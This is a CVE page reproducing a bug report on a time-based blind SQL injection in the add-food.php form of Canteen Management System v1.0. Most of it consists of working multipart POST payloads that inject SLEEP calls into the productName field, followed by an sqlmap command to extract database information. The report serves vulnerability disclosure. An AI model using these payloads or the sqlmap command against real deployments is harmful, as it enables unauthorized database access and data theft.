Headline

CVE-2022-43049: bug_report_canteen/SQLi.md at master · sdpyly/bug_report_canteen

Canteen Management System Project v1.0 was discovered to contain a SQL injection vulnerability via the component /youthappam/add-food.php.

2 years ago

CVE

Open in Source

#sql #vulnerability #web #php #auth #webkit

Canteen Management System Project v1.0 by mayuri_k has SQL injection

BUG_Author: YorkLee

vendors:https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

Vulnerability File: /youthappam/add-food.php

Vulnerability location: /youthappam/add-food.php POST form exists time-based blind injection vulnerability

Payload1:

------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productName"

123' AND (SELECT 5842 FROM (SELECT(SLEEP(5)))JKeV) AND 'jYhF'='jYhF
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="quantity"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="rate"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="categoryName"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productStatus"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="create"


------WebKitFormBoundarywm9jYBqgKtHi9E5z--

note: the field "------WebKitFormBoundarywm9jYBqgKtHi9E5z" is from Content-Type that in http-header

SELECT(SLEEP(5)) The server response time is 5 seconds

Payload2:

------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productName"

123' AND (SELECT 5842 FROM (SELECT(SLEEP(10)))JKeV) AND 'jYhF'='jYhF
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="quantity"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="rate"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="categoryName"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productStatus"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="create"


------WebKitFormBoundarywm9jYBqgKtHi9E5z--

note: the field "------WebKitFormBoundarywm9jYBqgKtHi9E5z" is from Content-Type that in http-header

SELECT(SLEEP(10)) The server response time is 10 seconds

Payload3:

------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productName"

123' AND (SELECT 5842 FROM (SELECT(SLEEP(15)))JKeV) AND 'jYhF'='jYhF
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="quantity"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="rate"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="categoryName"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productStatus"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="create"


------WebKitFormBoundarywm9jYBqgKtHi9E5z--

note: the field "------WebKitFormBoundarywm9jYBqgKtHi9E5z" is from Content-Type that in http-header

SELECT(SLEEP(15)) The server response time is 15 seconds

Payload4:

Store the post message in a file, and further disclose the database information through sqlmap.

sqlmap cmd: python .\sqlmap.py -r .\header.txt --tamper=space2comment --risk 3 -current-db

results: